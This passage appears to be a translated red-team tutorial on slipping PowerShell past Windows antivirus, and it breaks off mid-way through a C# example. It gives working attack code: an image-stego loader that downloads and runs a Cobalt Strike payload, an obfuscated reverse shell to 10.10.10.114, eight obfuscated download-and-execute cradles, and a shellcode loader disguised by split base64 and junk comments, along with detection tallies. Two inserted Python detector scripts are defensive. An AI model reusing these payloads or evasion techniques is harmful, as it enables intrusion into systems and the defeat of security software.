
PowerShell AV evasion (免杀)


Introduction

Windows PowerShell is a command-line shell and scripting environment that lets command-line users and script authors take advantage of the .NET Framework. PowerShell has long been a favourite for internal network penetration: Microsoft is genuinely pushing it, and more and more of its own software, Office included, calls PowerShell under the hood. In recent years, using PowerShell for lateral movement and AV evasion during internal network penetration has stayed consistently popular.

PowerShell script files are text files whose name carries the extension ".ps1". PowerShell requires the .NET environment and works with .NET objects; in readability and ease of use it ranks first among all shells. PowerShell has the following characteristics:

  • Installed by default on Windows 7 and later.

  • PowerShell scripts can run in memory without being written to disk.

  • Almost never triggers antivirus software.

  • Can be executed remotely.

  • Many current tools are built on PowerShell.

  • Makes scripting attacks on Windows easier.

  • cmd.exe is often blocked from running, but PowerShell is not.

  • Can be used to manage Active Directory.

PowerShell execution policies

  Unrestricted: the most permissive policy; any script runs without restriction
  Restricted: the default policy; no script execution is allowed
  AllSigned: every script must be signed before it can run
  RemoteSigned: local scripts are unrestricted, but scripts that came from the network must be signed
  Bypass: no restrictions and no prompts
  Undefined: no script policy has been set

To view the current PowerShell policy: Get-ExecutionPolicy

In practice, though, changing the PowerShell execution policy is not very useful: it is a noisy action that AV easily notices. 360 (tested on Win7) has now also started blocking PowerShell invocation... (under Win7, 360 intercepts PowerShell, but under Win10 it does not.....)

Invoke-PSImage: hiding PowerShell code in an image

Reference: https://blog.csdn.net/Hungchuiho/article/details/121436429

https://github.com/peewpw/Invoke-PSImage

Encodes a PowerShell script in the pixels of a PNG file and generates a one-liner to execute it. Invoke-PSImage takes a PowerShell script and encodes its bytes into the pixels of a PNG image, then generates a one-liner that executes the script from a file or from the web. It can either create a new image from the payload data alone or embed the payload in the least significant bits of an existing image so that it looks like a real picture. The image is saved as PNG and can be losslessly compressed without affecting the ability to execute the payload, because the data is stored in the colour values themselves. When a new image is created, an ordinary PowerShell script actually compresses significantly, typically producing a PNG about 50% the size of the original script. With the embed method, the least significant 4 bits of 2 colour values in each pixel hold the payload; image quality suffers somewhat, but it still looks fine. Most image types are accepted as input, but the output is always PNG because it has to be lossless. Each pixel of the image holds one byte of the script, so the image needs at least as many pixels as the script has bytes. That is fairly easy to satisfy; Invoke-Mimikatz, for example, fits in a 1920x1200 image.

First find a high-resolution image, 123.jpg, to hold the shellcode in the later steps.



Generate a PowerShell payload in CS (Cobalt Strike).

Run the following commands from cmd:

```powershell
Powershell -ExecutionPolicy Bypass
Import-Module .\Invoke-PSImage.ps1
Invoke-PSImage -Script .\payload.ps1 -Image .\123.jpg -Out 456.jpg -Web
```

When running Import-Module, AV has to be turned off, otherwise access is denied.


456.jpg is then generated in the current directory.


PowerShell then outputs a snippet of PS1 code; copy it and save it as shell.ps1.

```powershell
sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http://example.com/456.jpg"));$o=a Byte[] 5120;(0..1)|%{foreach($x in(0..2559)){$p=$g.GetPixel($x,$_);$o[$_*2560+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..3534]))
```


Open CS and use the file hosting module to host the generated 456.jpg; clicking "Launch" produces a URL.


http://10.10.10.114:80/456.jpg

Then change the URL in shell.ps1 to the link generated by CS.


Save it as the PS1 file shell.ps1:

```powershell
sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http://10.10.10.114:80/456.jpg"));$o=a Byte[] 5120;(0..1)|%{foreach($x in(0..2559)){$p=$g.GetPixel($x,$_);$o[$_*2560+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..3534]))
```

Running it on a local machine with Huorong installed, the beacon checks in successfully... but a static scan of shell.ps1 gets it killed, so the PowerShell can be obfuscated first.


Tencent PC Manager does not detect it, and the beacon checks in directly.

Invoke-Obfuscation

There are many ways to make PowerShell evade AV; encoding the code is the most common. Here we introduce Invoke-Obfuscation, a framework built specifically to encode PowerShell for evasion; it is also a tool frequently used by the well-known APT32 (OceanLotus) group. The tool can obfuscate PowerShell code with ASCII/hex/octal/binary encodings and even SecureString.

Use Invoke-Obfuscation to obfuscate the PowerShell. Put shell.ps1 in the tool's directory, then:

```powershell
Powershell -ExecutionPolicy Bypass
Import-Module .\Invoke-Obfuscation.psd1
Invoke-Obfuscation
```

The obfuscated output, saved as shell2.ps1:

```powershell
${3`7j}=  [typE]("{0}{1}" -F'mat','H')  ; ${K8`ZR2J} = [tYPE]("{0}{2}{6}{4}{3}{5}{1}" -F 'Syste','nG','m.','N','t.e','coDI','TEX'); &("{1}{0}" -f'al','s') ('a') ("{0}{1}{2}"-f'New-O','bj','ect');.("{1}{2}{0}" -f 'pe','A','dd-Ty') -A ("{0}{3}{2}{1}" -f 'S','Drawing','em.','yst');${g}=&('a') ("{1}{3}{0}{2}{4}"-f'aw','Syst','ing.Bitma','em.Dr','p')((&('a') ("{3}{2}{1}{0}" -f 'nt','e','WebCli','Net.')).("{2}{0}{1}"-f 'penRea','d','O').Invoke(("{1}{7}{5}{3}{8}{4}{0}{2}{6}" -f'.','http://1','j','4:80','56','.10.10.11','pg','0','/4')));${O}=.('a') ("{0}{1}" -f'By','te[]') 5120;(0..1)|.('%'){foreach(${x} in(0..2559)){${p}=${g}.("{0}{2}{1}" -f 'Ge','Pixel','t').Invoke(${x},${_});${o}[${_}*2560+${x}]=( (ChIlDiTeM  ("{0}{2}{3}{1}"-f 'VaRia','e:37J','b','L') )."vaL`Ue"::("{0}{1}"-f 'Fl','oor').Invoke((${P}."B"-band15)*16)-bor(${P}."g" -band 15))}};.("{0}{1}"-f'I','EX')(  ( gci  ('V'+'ar'+'Iab'+'LE:k8ZR'+'2J') )."VA`LUe"::"ASC`iI"."GEt`s`TRi`Ng"(${o}[0..3534]))
```

Static detection results

Before obfuscation: (screenshot of the scan result)

After obfuscation: (screenshots of the scan results)

It also passes 360's static scan (but 360 now blocks PowerShell invocation altogether, so...)

Upload to VirusTotal to see the result after obfuscation:

https://www.virustotal.com/gui/file/03e35a1c21bd99766c6f7729c59df32340b2f88ecf834236c143584fc2390d9e?nocache=1


Dynamic detection results


Under Huorong and Tencent PC Manager the beacon checks in normally, but 360 blocks PowerShell invocation, so it could not be used successfully there...

PowerShell socket evasion

```powershell
Set-Variable -Name client -Value (New-Object System.Net.Sockets.TCPClient("10.10.10.114", 53));

Set-Variable -Name stream -Value($client.GetStream());

[byte[]]$bytes = 0..65535 | % { 0 };

while ((Set-Variable -Name i -Value($stream.Read($bytes, 0, $bytes.Length))) -ne 0)
{
Set-Variable -Name data -Value ((New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i));
Set-Variable -Name sendback -Value (iex $data 2>&1 | Out-String );
Set-Variable -Name sendback2 -Value ($sendback + "PS " + (pwd).Path + "> ");
Set-Variable -Name sendbyte -Value (([text.encoding]::ASCII).GetBytes($sendback2));
$stream.Write($sendbyte, 0,$sendbyte.Length);
$stream.Flush()
}
$client.Close()
```

After obfuscation with Invoke-Obfuscation:

```powershell
Set-Variable -Name client -Value (New-Object System.Net.Sockets.TCPClient("10.10.10.114", 53));
&('sV') ("{0}{1}" -f 'p','w4c') ( [tYPE]("{1}{3}{2}{0}"-f 'nG','TE',("{1}{2}{0}" -f'i','En','cOd'),'Xt.') ) ;&("{0}{2}{1}{3}"-f("{0}{1}" -f'Set','-'),'b',("{1}{0}"-f'aria','V'),'le') -Value (${C`L`IEnT}.("{1}{2}{0}" -f 'am',("{0}{1}" -f'G','etS'),'tre')."i`N`VoKe"()) -Name ("{0}{1}{2}" -f 's',("{0}{1}"-f'tr','ea'),'m');[byte[]]${b`Yt`es} =0..65535|&('%'){0};while((.("{0}{2}{3}{1}"-f'S',("{0}{1}" -f'i','able'),'et',("{0}{1}" -f '-','Var')) -Name ('i') -Value(${s`T`Ream}.("{0}{1}"-f'Rea','d')."IN`Voke"(${b`Y`TES}, 0,${By`Tes}."LeNg`TH"))) -ne 0){;&("{2}{0}{1}" -f'Va',("{0}{1}"-f 'ria','ble'),("{1}{0}"-f 't-','Se')) -Name ("{1}{0}"-f'ta','da') -Value ((&("{2}{1}{0}" -f 'ect',("{0}{1}"-f'w-','Obj'),'Ne') -TypeName ("{4}{2}{1}{0}{5}{3}" -f'IEn','I',("{1}{0}{2}" -f'.','xt','ASC'),("{1}{0}"-f'ding','o'),("{1}{2}{0}" -f'e','Sys','tem.T'),'c'))."g`e`TSTRiNg"(${bYT`Es},0, ${I}));.("{1}{2}{0}{3}"-f'i','Se',("{1}{0}"-f'r','t-Va'),("{1}{0}"-f 'ble','a')) -Value (.("{0}{1}"-f'ie','x') ${D`ATA} 2>&1 | .("{1}{2}{0}"-f'g','Ou',("{0}{1}"-f't-Stri','n')) ) -Name("{0}{1}" -f ("{1}{2}{0}"-f'c','se','ndba'),'k');.("{0}{3}{1}{2}" -f'Se',("{0}{1}"-f 'Va','riabl'),'e','t-') -Value (${sE`NDBack} + "PS " + (.("{0}{1}" -f'p','wd'))."P`ATH" + "> ") -Name ("{0}{1}"-f'se',("{0}{2}{1}"-f'n','ack2','db'));&("{1}{2}{3}{0}"-f 'le',("{0}{1}"-f 'Set-','Va'),'ri','ab') -Name("{1}{0}"-f ("{0}{1}"-f'ndbyt','e'),'se') -Value (( ( .("{0}{1}" -f'i','tEm') ("{4}{2}{1}{0}{3}"-f'W4','Ble:p','IA','C','vaR'))."vAL`UE"::"Asc`II").("{0}{1}" -f("{0}{1}"-f 'Get','By'),'tes')."in`VOKE"(${SEN`D`BAck2}));${str`eam}.("{0}{1}" -f'Wri','te')."InV`OKE"(${S`en`D`BYTE},0,${SeN`D`ByTe}."lE`NGtH");${ST`R`EaM}.("{0}{1}" -f ("{0}{1}"-f'F','lus'),'h')."IN`V`oKe"()};${cl`I`eNT}.("{0}{1}" -f'C',("{0}{1}"-f'los','e'))."I`N`Voke"()
```

Run on the target machine:

```powershell
Powershell -ExecutionPolicy Bypass
.\11.ps1
```

Listen on Kali with nc -lvvp 53


Huorong does not block it.

In the Win7 VM, 360 does not block it.


But 360 now blocks PowerShell altogether: as long as 360 is enabled (it blocks under Win7, though not in Win10 testing), PowerShell cannot be invoked at all.


Command obfuscation in the PS1 source (behavioural evasion)

Even when the PowerShell code itself evades AV, remotely downloading or executing shellcode through PowerShell is easily spotted and blocked by AV.

Commonly used PowerShell command-execution patterns:

```powershell
powershell -NoExit "IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.114/shell.ps1')"

powershell -NoExit "Invoke-Expression (New-Object Net.WebClient)."D`o`wn`l`oad`Str`in`g"('h'+'ttp://127.0.0.1:8000/1.txt')"
```



AV blocks these.

Usually they can be bypassed by rewriting the function call:

```powershell
Invoke-Expression (New-Object System.Net.WebClient).DownloadString("http://127.0.0.1:8000/1.txt")

powershell -NoExit "IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.114/shell.ps1')"
```




  • 1. Drop the System keyword

```powershell
Invoke-Expression (New-Object Net.WebClient).DownloadString("http://10.10.10.114:8000/1.txt")
```

  • 2. Join the string with the + operator

```powershell
Invoke-Expression (New-Object Net.WebClient).DownloadString('h'+'ttp://10.10.10.114:8000/1.txt')
```

  • 3. Use the Invoke method

```powershell
Invoke-Expression (New-Object Net.WebClient).("DownloadString").Invoke('h'+'ttp://10.10.10.114:8000/1.txt')
```

  • 4. Variable substitution

```powershell
$ds="Down"+"loadString";
Invoke-Expression (New-Object Net.WebClient).$ds.Invoke('h'+'ttp://10.10.10.114:8000/1.txt')
```

  • 5. Wrap the keyword in single or double quotes

```powershell
Invoke-Expression (New-Object Net.WebClient)."DownloadString"('h'+'ttp://10.10.10.114/powershell')
```

  • 6. Escape characters (backticks inside the method name)

```powershell
Invoke-Expression (New-Object Net.WebClient)."D`o`wn`l`oad`Str`in`g"('h'+'ttp://10.10.10.114:8000/1.txt')
```

  • 7. String reversal

```powershell
$re= ")'txt.1/0008:411.01.01.01//:ptth'(gnirtSdaolnwoD.)tneilCbeW.teN tcejbO-weN(";
($re[-1..-($re.Length)] -Join '') | IEX
```

  • 8. Encoded execution

```powershell
$command = "Invoke-Expression (New-Object Net.WebClient).DownloadString('h'+'ttp://10.10.10.114:8000/1.txt')"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
powershell.exe -EncodedCommand $encodedCommand
```
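The eight variants above share a few textual tells: format-operator string assembly, backticks inside names, reversed strings, 'h'+'ttp' URL splitting, a download cradle piped into IEX, and base64 behind -EncodedCommand. The Python script below is an added example, not from the original post: it decodes -EncodedCommand arguments (base64 of UTF-16LE text) before matching and scores constructed command lines against those indicators. The same check applies to PowerShell Script Block Logging (Event ID 4104) entries, which record the script blocks the engine actually runs, including the ones IEX assembles at run time.

```python
import base64
import re

# Indicators drawn from the obfuscation variants walked through above.
INDICATORS = {
    "format_operator": re.compile(r'"\{\d+\}(?:\{\d+\})*"\s*-f\b', re.I),        # "{1}{0}" -f 'al','s'
    "backtick_identifier": re.compile(r'\$\{[^}]*`[^}]*\}|"[A-Za-z]+(?:`[A-Za-z]+)+"'),  # ${K8`ZR2J}, "vaL`Ue"
    "string_reversal": re.compile(r'\[-1\.\.-\(\s*\$\w+\.Length\s*\)\]', re.I),  # $re[-1..-($re.Length)]
    "url_fragment_concat": re.compile(r"'h'\s*\+\s*'ttp", re.I),                 # 'h'+'ttp://...'
    "download_cradle": re.compile(r'DownloadString|Net\.WebClient', re.I),
    "invoke_expression": re.compile(r'\bIEX\b|Invoke-Expression', re.I),
    "split_base64": re.compile(r'FromBase64String\(\s*\$\w+(?:\s*\+\s*\$\w+){2,}\s*\)', re.I),
}
# -e / -enc / -EncodedCommand followed by its base64 argument
ENCODED_ARG = re.compile(r'-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)', re.I)


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE text), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_script(text):
    """Return (score, matched indicator names) for one script or command line."""
    # Decode an -EncodedCommand invocation first, so the indicators are matched
    # against the real script rather than its base64 wrapper.
    decoded = decode_encoded_command(text)
    if decoded:
        text = text + "\n" + decoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    return len(hits), hits


# Constructed samples (not from the post): one benign admin line and lines shaped
# like the variants above; the cradle URL is a placeholder host, not a real one.
CRADLE_SAMPLE = "IEX (New-Object Net.WebClient).DownloadString('h'+'ttp://example.invalid/a.ps1')"
SAMPLES = {
    "admin_listing": r"Get-ChildItem C:\Windows\Temp | Sort-Object Length",
    "format_operator": """&("{1}{0}" -f'al','s') ('a') ("{0}{1}{2}"-f'New-O','bj','ect')""",
    "reversed_string": "$re=')...(';($re[-1..-($re.Length)] -Join '') | IEX",
    "encoded_command": "powershell.exe -NoP -EncodedCommand "
    + base64.b64encode(CRADLE_SAMPLE.encode("utf-16-le")).decode("ascii"),
    "split_base64": "$bbb=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($p1+$p2+$p3+$p4))",
}

if __name__ == "__main__":
    for name, line in SAMPLES.items():
        score, hits = score_script(line)
        print(f"{name:16} score={score} {hits}")
```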

After obfuscation, Huorong no longer blocks it.


After obfuscation, Tencent PC Manager is bypassed as well.

Base64-encoded PowerShell + random splitting + junk comments

```powershell
Set-StrictMode -Version 2

$Dolt = @'
function func_get_proc_address {
Param ($var_module, $var_procedure)
$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
[Parameter(Position = 1)] [Type] $var_return_type = [Void]
)

$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [System.Convert]::FromBase64String('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')

for ($x = 0; $x -lt $var_code.Count; $x++) {
$var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
start-job { param($a) IEX $a } -RunAs32 -Argument $Dolt | wait-job | Receive-Job
}
else {
IEX $Dolt
}
```

This is the original PowerShell payload generated by CS.

Here, the content inside $Dolt's @'...'@ here-string is base64-encoded, then decoded through another variable, and the variable names are changed; this alone is enough to bypass Huorong and 360.

```powershell
Set-StrictMode -Version 2

$AAA = @'
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
'@

$bbb= [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($AAA))
If ([IntPtr]::size -eq 8) {
start-job { param($a) IEX $a } -RunAs32 -Argument $bbb | wait-job | Receive-Job
}
else {
IEX $bbb
}
```

Upload to VT:


The detection rate is still fairly high, so the $AAA variable above can be split into pieces.

Next, split $AAA arbitrarily into 4 parts and concatenate them back together, then check the effect on VT:

```powershell
Set-StrictMode -Version 2

$AAA = @'
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
'@

$p1 = 'ZnVuY3Rpb24gZnVuY19nZXRfcHJvY19hZGRyZXNzIHsKCVBhcmFtICgkdmFyX21vZHVsZSwgJHZhcl9wcm9jZWR1cmUpCQkKCSR2YXJfdW5zYWZlX25hdGl2ZV9tZXRob2RzID0gKFtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKSB8IFdoZXJlLU9iamVjdCB7ICRfLkdsb2JhbEFzc2VtYmx5Q2FjaGUgLUFuZCAkXy5Mb2NhdGlvbi5TcGxpdCgnXFwnKVstMV0uRXF1YWxzKCdTeXN0ZW0uZGxsJykgfSkuR2V0VHlwZSgnTWljcm9zb2Z0LldpbjMyLlVuc2FmZU5hdGl2ZU1ldGhvZHMnKQoJJHZhcl9ncGEgPSAkdmFyX3V'

$p2 = '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'
$p3 = 'Bbk1HWTJKemVCZC9jM2w3RmhjTGMzMEtGR0JnQ2hSZUIyWnFZR0p4RG5CM1ltMW5ZbkZuRG1KdGQycDFhbkYyY0E1M1puQjNEbVZxYjJZQ0Iyc0lhd2tqRm13Q2N3WmpZbk40RjM5emVYc1dGd3R6ZlFvVVlHQUtGRjRIWm1wZ1luRU9jSGRpYldkaWNXY09ZbTEzYW5WcWNYWndEbmRtY0hjT1pXcHZaZ0lIYXdockNTTVdiQUp6Qm1OaWMzZ1hmM041ZXhZWEMzTjlDaFJnWUFvVVhnZG1hbUJpY1E1d2QySnRaMkp4Wnc1aWJYZHFkV3B4ZG5BT2QyWndkdzVsYW05bUFnZHJDR3NKSXhac0FuTUdZMkp6ZUJkL2MzbDdGaGNMYzMwS0ZDTkwwNWFCZGR6MlNXTkxJek1qSTBzakkyTWpkRXQ3aDNERzNQYXdtaU1qSXlNaStuSndxc1IwU3lNREl5TndkVXN4dGFyQjNQYW00MWZscUNRaTRLYmpWc1o3NE11SzN0emNFaE1ORWhNTkVoTU5FaElYSXlNakl5TT0nKQoKZm9yICgkeCA9IDA7ICR4IC1sdCAkdmFyX2NvZGUuQ291bnQ7ICR4KyspIHsKCSR2YXJfY29kZVskeF0gPSAkdmFyX2NvZGVbJHhdIC1ieG9yIDM1Cn0KCiR2YXJfdmEgPSBbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcigoZnVuY19nZXRfcHJvY19hZGRyZXNzIGtlcm5lbDMyLmRsbCBWaXJ0dWFsQWxsb2MpLCAoZnVuY19nZX'
$p4 = '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'


#$bbb= [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($AAA))
$bbb= [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($p1+$p2+$p3+$p4))
If ([IntPtr]::size -eq 8) {
start-job { param($a) IEX $a } -RunAs32 -Argument $bbb | wait-job | Receive-Job
}
else {
IEX $bbb
}
```

The beacon checks in to CS.


No change on VT.


Let's transform it further.

Besides base64, AES, XOR, ASCII and other encodings can be used here, and junk comments can be added as noise:

```powershell
Set-StrictMode -Version 2

#asdYyY0E1hd2tqRm13Q2N3Wessda2mpdGd3R6w1da3RmhjTGMzMEt13G9rZShbSW50UHRyXTo6Wm5dasCM1ltMW5ZbkZuRG1KdG9rZShbSW50UHRyXTo63r2sdaQycDFhbkYZlFvVVlHQ
$a314fpda9 = 'ZnVuY3Rpb24gZnVuY19nZXRfcHJvY19hZGRyZXNzIHsKCVBhcmFtICgkdmFyX21vZHVsZSwgJHZhcl9wcm9jZWR1cmUpCQkKCSR2YXJfdW5zYWZlX25hdGl2ZV9tZXRob2RzID0gKFtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKSB8IFdoZXJlLU9iamVjdCB7ICRfLkdsb2JhbEFzc2VtYmx5Q2FjaGUgLUFuZCAkXy5Mb2NhdGlvbi5TcGxpdCgnXFwnKVstMV0uRXF1YWxzKCdTeXN0ZW0uZGxsJykgfSkuR2V0VHlwZSgnTWljcm9zb2Z0LldpbjMyLlVuc2FmZU5hdGl2ZU1ldGhvZHMnKQoJJHZhcl9ncGEgPSAkdmFyX3V'
#asdYyY0E1M1puQjNEbVZasdxYjJZ356dqqQ0Iyew4cas0lhd2tqRm13Q2N3Wes2mpZbk40RjM5emVYc1dGd3R6ZlFvVVlHQ
$psdaadsas = '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'#adfijkhiu2y988hdcbnkjhiugsdaaslkh2eoiheiuoe2hncxxlknxc nvdh9802yuhiodhoahjieasssreshelsa1s
$213rdsaf3 = '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'#fasdhnkjlh2iuhjdcb789gheh289hsko-0e22e
#asdYyY0E1hd2tqRm13Q2N3Wes2mpZbk40RjM5emVYfadsraeawweaewjTGMzMEtG9rZShbSW50UHRyXTo6WmVybyR0JnQ2hSZUIyWnFZsadaR0p4RG5CM1ltMw23142W5ZbkZuRG1KdG9rZShbSW50UHRyXTo6WmVybyQycDFhbkYZlFvVVlHQ
$1sdasfp24 = 'RfZGVsZWdhdGVfdHlwZSBAKFtJbnRQdHJdLCBbVUludDMyXSwgW1VJbnQzMl0sIFtVSW50MzJdKSAoW0ludFB0cl0pKSkKJHZhcl9idWZmZXIgPSAkdmFyX3ZhLkludm9rZShbSW50UHRyXTo6WmVybywgJHZhcl9jb2RlLkxlbmd0aCwgMHgzMDAwLCAweDQwKQpbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpDb3B5KCR2YXJfY29kZSwgMCwgJHZhcl9idWZmZXIsICR2YXJfY29kZS5sZW5ndGgpCgokdmFyX3J1bm1lID0gW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsXTo6R2V0RGVsZWdhdGVGb3JGdW5jdGlvblBvaW50ZXIoJHZhcl9idWZmZXIsIChmdW5jX2dldF9kZWxlZ2F0ZV90eXBlIEAoW0ludFB0cl0pIChbVm9pZF0pKSkKJHZhcl9ydW5tZS5JbnZva2UoW0ludFB0cl06Olplcm8p'
#asdYyY0E1hd2tqRm13Q2N3Wes2mpZbk40RjM5emVYc1dGd3R6w3RmhjTGMzMEtG9rZShbSW50UHRyXTo6WmVybyR0JnQ2hSZUIyWnFZR0p4RG5CM1ltMW5ZbkZuRG1KdG9rZShbSW50UHRyXTo6WmVybyQycDFhbkYZlFvVVlHQ

$bbb= [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a314fpda9+$psdaadsas+$213rdsaf3+$1sdasfp24))#JKemVCZC9jM2w3RmhjTGkkyTWpkRXQ3aDNERzNQYXdtaU00MWZscUNRaTRLYmpWc1o3NE11SzN0emNFaE1ORWhNTkVoTU5FaElYSXlNa)
If ([IntPtr]::size -eq 8 ) {#asdYyY0E1hd2tqRm13Q2N3Wes2mpZbk40RjM5emVYc1dGd3R6w3RmhjTGMzMEtG9rZShbSW50UHRyXTo6WmVybyR0JnQ2hSZUIyWnFZR0p4RG5CM1ltMW5ZbkZuRG1KdG9rZShbSW50UHRyXTo6WmVybyQycDFhbkYZlFvVVlHQ
start-job { param($a) IEX $a } -RunAs32 -Argument $bbb | wait-job | Receive-Job #dsasafaaffafaaffaasdsa31241412sdad231 rfdadsaf43gv213aat64zxcr
}
else {
IEX $bbb #asd22jnk43lhjsd9u23nkl#asdYyY0E1hd2tqRm13Q2N3Wes2mpZbk40RjM5emVYc1dGd3R6w3RmhjTGMzMEtG9ryXTo6WmVybyR0JnQ2hSZUIyWnFZR0p4RG5CM1ltMW5ZbkZuRG1KdG9rZShbSW50UHRyXTo6WmVybyQycDFhbkYZlFvVVlHQf89dy890w3epoi2j231r34ra
}
```
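The loader above changes its variable names, split points and junk comments from sample to sample, which is exactly why fixed signatures on it decay; what it cannot change is that the fragments are concatenated back inside FromBase64String(...) in a fixed order. The Python helper below is an added example, not from the original post or the linked article: it strips the comments, collects the single-quoted assignments, reads the fragment order from the FromBase64String call, and recovers the embedded script from a constructed loader that carries a benign payload.

```python
import base64
import re

# A '#' starts a comment unless it sits inside single quotes (odd number of quotes after it)
COMMENT = re.compile(r"#(?=(?:[^']*'[^']*')*[^']*$).*")
# $name = '<single-quoted literal>'
ASSIGN = re.compile(r"^\s*\$(\w+)\s*=\s*'([^']*)'")
# FromBase64String($a+$b+$c ...): the concatenation that fixes the fragment order
CONCAT = re.compile(r"FromBase64String\(\s*((?:\$\w+\s*\+\s*)+\$\w+)\s*\)", re.I)


def reassemble_payload(script):
    """Return the script embedded in a split-base64 loader, or None if the pattern is absent."""
    fragments, order = {}, None
    for raw in script.splitlines():
        line = COMMENT.sub("", raw)          # junk comments never reach the parser
        m = ASSIGN.match(line)
        if m:
            fragments[m.group(1)] = m.group(2)
        c = CONCAT.search(line)
        if c:
            order = re.findall(r"\$(\w+)", c.group(1))
    if not order or any(name not in fragments for name in order):
        return None
    try:
        joined = "".join(fragments[name] for name in order)
        return base64.b64decode(joined, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed sample in the shape of the loader above; the payload is benign.
PAYLOAD = "Write-Output 'reassembled'"
_b64 = base64.b64encode(PAYLOAD.encode("utf-8")).decode("ascii")
_cuts = [0, 7, 15, 24, len(_b64)]
_frag = [_b64[_cuts[i]:_cuts[i + 1]] for i in range(4)]
SAMPLE_LOADER = f"""Set-StrictMode -Version 2
#asdYyY0E1hd2tqRm13Q2N3Wessda2mpdGd3R6w1da3RmhjTGMzMEt
$a314fpda9 = '{_frag[0]}'
#asdYyY0E1M1puQjNEbVZasdxYjJZ356dqqQ0Iyew4cas0lhd2tq
$psdaadsas = '{_frag[1]}'#adfijkhiu2y988hdcbnkjhiugsdaaslkh2eoiheiuoe2hncxx
$213rdsaf3 = '{_frag[2]}'#fasdhnkjlh2iuhjdcb789gheh289hsko-0e22e
$1sdasfp24 = '{_frag[3]}'
$bbb= [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a314fpda9+$psdaadsas+$213rdsaf3+$1sdasfp24))#JKemVCZC9jM2w3Rmhj
IEX $bbb #asd22jnk43lhjsd9u23nkl
"""

if __name__ == "__main__":
    print(reassemble_payload(SAMPLE_LOADER))    # Write-Output 'reassembled'
```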

Detections dropped from 15 to 5, so adding junk comments does help; however, it is caught by AMSI and cannot bypass Windows Defender.

https://mp.weixin.qq.com/s/znyLqniUX_WXRizGV6TQlA

This article splits the PS payload into random segments so that the result is different every time. AV sometimes records signatures, so a fixed set of segments may stop working, whereas random slicing works better.


Calling the Windows API from C#

Project: https://github.com/INotGreen/nopowershell. Thanks to Green (格林师傅) for providing the evasion article.

In VS, add C:Files (x86)Assemblies\3.0 to the project as a reference.

This executes PowerShell commands by calling the Windows API directly, which gets around 360's blocking of PowerShell.

```csharp
using System;
using System.Management.Automation.Runspaces;
using System.Text;

namespace nopowershell
{
    class Program
    {
        static void Main(string[] args)
        {
            // base64-encoded PS1 script; "Y2FsYw==" decodes to "calc"
            byte[] psrevshell = Convert.FromBase64String("Y2FsYw==");
